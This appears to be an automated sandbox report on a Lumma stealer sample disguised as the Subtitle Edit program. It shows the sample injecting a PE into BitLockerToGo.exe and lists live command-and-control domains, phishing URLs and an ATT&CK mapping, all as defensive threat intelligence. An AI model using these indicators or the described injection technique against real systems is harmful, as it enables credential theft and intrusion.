Source: 0Subtitle Edit.exe	String found in binary or memory: google/protobuf/field_mask.prototimestamp (%v) before 0001-01-01timeseries: bad level argument: could not parse value for %v: %qinvalid escape code %q in stringrelease of handle with refcount 0Image base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %sbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListhttps://login.microsoftonline.us/crypto/aes: output not full blockskip everything and stop the walkGetVolumeNameForVolumeMountPointWslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexwaiting for unsupported file type142108547152020037174224853515625710542735760100185871124267578125encoding: missing byte order markreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesindefinite length found (not DER)struct contains unexported fieldsError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodyapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vhttp: multiple registrations for unsupported transfer encoding: %qgo package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: invalid client finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmCryptAcquireCertificatePrivateKeySetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWGODEBUG: no value specified for "unaligned 64-bit atomic operationSigEd25519 no Ed25519 collisions
Source: 0Subtitle Edit.exe	String found in binary or memory: google/protobuf/field_mask.prototimestamp (%v) before 0001-01-01timeseries: bad level argument: could not parse value for %v: %qinvalid escape code %q in stringrelease of handle with refcount 0Image base beyond allowed addressThunk AddressOfData beyond limitsCentral Kurdish Iraq (ku-Arab-IQ)Norwegian (Bokmal) Norway (nb-NO)could not find signer certificateinvalid VS_VERSION_INFO block. %sbytes.Buffer.Grow: negative countbytes.Reader.Seek: invalid whencetoo many levels of symbolic linksInitializeProcThreadAttributeListhttps://login.microsoftonline.us/crypto/aes: output not full blockskip everything and stop the walkGetVolumeNameForVolumeMountPointWslice bounds out of range [%x:%y]runtime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangesync: RUnlock of unlocked RWMutexwaiting for unsupported file type142108547152020037174224853515625710542735760100185871124267578125encoding: missing byte order markreflect: slice index out of rangereflect: NumOut of non-func type of method on nil interface valuereflect: Field index out of rangereflect: array index out of rangereflect.Value.Equal: invalid Kind to pointer to array with length crypto: requested hash function #x509: invalid RSA public exponentx509: SAN rfc822Name is malformedx509: invalid extended key usagesindefinite length found (not DER)struct contains unexported fieldsError: Logrus exit handler error:pseudo header field after regularhttp: invalid Read on closed Bodyapplication/x-www-form-urlencodedinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vhttp: multiple registrations for unsupported transfer encoding: %qgo package net: confVal.netCgo = tls: failed to write to key log: tls: invalid server finished hashtls: invalid client finished hashtls: unexpected ServerKeyExchangetls: unknown public key algorithmCryptAcquireCertificatePrivateKeySetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWGODEBUG: no value specified for "unaligned 64-bit atomic operationSigEd25519 no Ed25519 collisions
Source: 0Subtitle Edit.exe	String found in binary or memory: net/addrselect.go
Source: 0Subtitle Edit.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: 0Subtitle Edit.exe	String found in binary or memory: github.com/magiconair/properties@v1.8.7/load.go
Source: 0Subtitle Edit.exe	String found in binary or memory: google.golang.org/grpc@v1.65.0/internal/balancerload/load.go
Source: 0Subtitle Edit.exe	String found in binary or memory: github.com/hashicorp/go-plugin@v1.6.1/internal/cmdrunner/addr_translator.go
Source: 0Subtitle Edit.exe	String found in binary or memory: github.com/hashicorp/yamux@v0.1.1/addr.go

Source: C:\Users\user\Desktop\0Subtitle Edit.exe

File read: C:\Users\user\Desktop\0Subtitle Edit.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0Subtitle Edit.exe "C:\Users\user\Desktop\0Subtitle Edit.exe"
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 0Subtitle Edit.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 0Subtitle Edit.exe

Static file information: File size 18028032 > 1048576

Source: 0Subtitle Edit.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x795000
Source: 0Subtitle Edit.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x8aa000

Source: 0Subtitle Edit.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp

Source: 0Subtitle Edit.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043D928 push cs; retn 0040h	2_2_0043D929
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_004226DE push ebp; ret	2_2_004226E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F790 push edx; iretd	2_2_0043F791
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0043F7A0 pushad ; iretd	2_2_0043F7A9

Source: C:\Users\user\Desktop\0Subtitle Edit.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 4036

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002847000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0Subtitle Edit.exe, 00000000.00000002.2282162764.000000000228D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00435DA0 LdrInitializeThunk,

2_2_00435DA0

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\0Subtitle Edit.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\0Subtitle Edit.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: caffegclasiqwp.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stamppreewntnq.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stagedchheiqwo.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: millyscroqwp.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: evoliutwoqm.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: condedqpwqm.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: traineiwnqo.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: locatedblsoqp.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002B96000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: separateedmsqj.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 24F008	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43A000	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44D000	Jump to behavior

Source: C:\Users\user\Desktop\0Subtitle Edit.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Queries volume information: C:\Users\user\Desktop\0Subtitle Edit.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\0Subtitle Edit.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
0Subtitle Edit.exe	34%	ReversingLabs	Win32.Trojan.LummaStealer

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://locatedblsoqp.shop/api	100%	Avira URL Cloud	malware
https://locatedblsoqp.shop/	100%	Avira URL Cloud	phishing
https://traineiwnqo.shop/api	100%	Avira URL Cloud	malware
http://earth.google.com/kml/2.2	0%	Avira URL Cloud	safe
http://www.opengis.net/gml	0%	Avira URL Cloud	safe
http://www.topografix.com/GPX/1/1	0%	Avira URL Cloud	safe
http://www.collada.org/2005/11/COLLADASchema	0%	Avira URL Cloud	safe
http://earth.google.com/kml/2.0	0%	Avira URL Cloud	safe
https://locatedblsoqp.shop/0z	100%	Avira URL Cloud	phishing
http://earth.google.com/kml/2.1	0%	Avira URL Cloud	safe
http://www.opengis.net/gml/3.3/exr	0%	Avira URL Cloud	safe
http://www.opengis.net/gml/3.2	0%	Avira URL Cloud	safe
https://traineiwnqo.shop/8	100%	Avira URL Cloud	malware
http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/ddos/glossary/malware/	0%	Avira URL Cloud	safe
http://www.opengis.net/kml/2.2	0%	Avira URL Cloud	safe
https://separateedmsqj.shop/api	100%	Avira URL Cloud	malware
https://locatedblsoqp.shop/W	100%	Avira URL Cloud	phishing
https://traineiwnqo.shop/	100%	Avira URL Cloud	malware
https://login.microsoftonline.us/crypto/aes:	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
https://separateedmsqj.shop/x86	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
separateedmsqj.shop	188.114.96.3	true	true	unknown
locatedblsoqp.shop	188.114.96.3	true	true	unknown
traineiwnqo.shop	188.114.96.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://locatedblsoqp.shop/api	true	Avira URL Cloud: malware	unknown
https://traineiwnqo.shop/api	true	Avira URL Cloud: malware	unknown
https://separateedmsqj.shop/api	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.opengis.net/gml	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.collada.org/2005/11/COLLADASchema	0Subtitle Edit.exe	false	Avira URL Cloud: safe	unknown
https://locatedblsoqp.shop/	BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.topografix.com/GPX/1/1	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locatedblsoqp.shop/0z	BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://earth.google.com/kml/2.2	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://earth.google.com/kml/2.0	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://earth.google.com/kml/2.1	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.opengis.net/gml/3.2	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2	0Subtitle Edit.exe, 00000000.00000002.2282605862.00000000028F4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://traineiwnqo.shop/8	BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.opengis.net/kml/2.2	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.opengis.net/gml/3.3/exr	0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/learning/ddos/glossary/malware/	BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://locatedblsoqp.shop/W	BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://login.microsoftonline.us/crypto/aes:	0Subtitle Edit.exe	false	Avira URL Cloud: safe	unknown
https://traineiwnqo.shop/	BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://separateedmsqj.shop/x86	BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	separateedmsqj.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501216
Start date and time:	2024-08-29 15:39:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0Subtitle Edit.exe
Detection:	MAL
Classification:	mal92.evad.winEXE@3/0@3/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 88% Number of executed functions: 12 Number of non-executed functions: 70
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 0Subtitle Edit.exe, PID 6732 because there are no executed function
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 0Subtitle Edit.exe

Simulations

Behavior and APIs

Time	Type	Description
09:40:21	API Interceptor	2x Sleep call for process: BitLockerToGo.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.96.3	Fordybendes.exe	Get hash	malicious	Azorult, GuLoader	Browse	d4hk.shop/DL341/index.php
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	www.begumnasreenbano.com/e8by/
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/zbi9vNYx/download
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/kDY6Kvx6/download
	PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	www.katasoo.com/7qad/
	709876765465.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	http://allegro-8888.com/	Get hash	malicious	Unknown	Browse	allegro-8888.com/xml/index.html
	PO_112234525626823775.js	Get hash	malicious	Lokibot	Browse	werdotx.shop/Devil/PWS/fre.php
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse	web.ad87h92j.com/4/t.bmp
	pXm5oVO3Go.exe	Get hash	malicious	Nitol	Browse	web.ad87h92j.com/4/t.bmp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
traineiwnqo.shop	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	iBO7gzlZr3.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	PDF To Excel Converter.exe	Get hash	malicious	LummaC, MicroClip	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup-Pro.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
locatedblsoqp.shop	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	iBO7gzlZr3.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	PDF To Excel Converter.exe	Get hash	malicious	LummaC, MicroClip	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup-Pro.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
separateedmsqj.shop	0csp_console.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	bot-check3.b-cdn.net.ps1	Get hash	malicious	LummaC	Browse	188.114.96.3
	bot-check1.b-cdn.net.ps1	Get hash	malicious	LummaC	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	188.114.96.3
